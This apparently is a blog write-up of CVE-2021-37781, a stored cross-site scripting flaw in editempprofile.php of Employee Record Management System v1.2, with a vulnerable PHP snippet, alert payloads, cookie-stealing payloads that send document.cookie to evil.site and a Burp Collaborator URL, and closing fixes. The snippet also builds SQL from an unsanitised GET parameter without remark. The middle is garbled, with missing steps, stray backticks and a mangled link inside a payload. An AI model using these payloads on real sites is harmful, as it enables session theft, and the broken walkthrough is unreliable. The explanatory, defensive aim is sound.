CVE-2021-37781 - Exploiting XSS in Employee Record Management System v1.2’s editempprofile.php

In today’s post, we'll take a close look at CVE-2021-37781: a Cross Site Scripting (XSS) vulnerability in version 1.2 of the Employee Record Management System (ERMS). We’ll see how this vulnerability in the editempprofile.php page allows attackers to inject malicious scripts and compromise users, including practical code examples and some hands-on exploit details.

Affected File: editempprofile.php

- CVE ID: CVE-2021-37781  

Here’s the official CVE entry.

How Does the Vulnerability Work?

The heart of the problem comes down to user-supplied data not being sanitized or escaped before being outputted on the Edit Employee Profile page. Any user with the right access, or even just a visitor, can insert HTML or JavaScript in fields that are later displayed, resulting in scripts running in the browser of whoever visits that page. This can lead to session hijacking, phishing, or account compromise.

Imagine the following snippet (simplified for clarity) from editempprofile.php

<?php
// ... database connection ...
$id = $_GET['id'];
$query = "SELECT * FROM employees WHERE id = '$id'";
$result = mysqli_query($conn, $query);
$row = mysqli_fetch_assoc($result);
?>
<form method="POST">
  Name: <input type="text" name="name" value="<?php echo $row['name']; ?>">
  <!-- more fields ... -->
  <input type="submit" value="Update">
</form>

Notice that <?php echo $row['name']; ?> directly outputs the value of name into the HTML without any escaping.

If an attacker manages to insert a value like<script>alert('XSS');</script>into the name field, whenever an admin visits the profile edit page, the script runs.

`

alert('This is XSS!');

They submit the form.

5. Now, whenever anyone (including administrators) views the edit page for this record, the injected script runs in their browser.
6. The attacker can replace alert('This is XSS!') with any malicious JavaScript, like stealing session cookies.

Sample payload to steal a cookie

<script>fetch('https://evil.site?cookie='+document.cookie)</script>

`

fetch('<a href="https://burpcollaborator.net/?c='+document.cookie" rel="nofollow">https://burpcollaborator.net/?c='+document.cookie</a>)

Modify PHP code to htmlspecialchars user fields

<input type="text" name="name" value="<?php echo htmlspecialchars($row['name'], ENT_QUOTES, 'UTF-8'); ?>">

2. Use prepared statements.

3. Employ a Content Security Policy (CSP).

References

- CVE-2021-37781
- Exploit-DB entry #50200
- OWASP Cross Site Scripting (XSS) Explained

Conclusion

CVE-2021-37781 may seem trivial at first—it only deals with one profile field—but as we’ve seen, the impact can be critical. Always treat user input as untrusted, sanitize and escape data, and review any page that outputs database content to the browser.

Stay safe and secure your applications!

Do you have questions or want to see more exploit writeups? Drop a comment below!

Timeline

Published on: 10/28/2022 15:15:00 UTC
Last modified on: 10/28/2022 18:32:00 UTC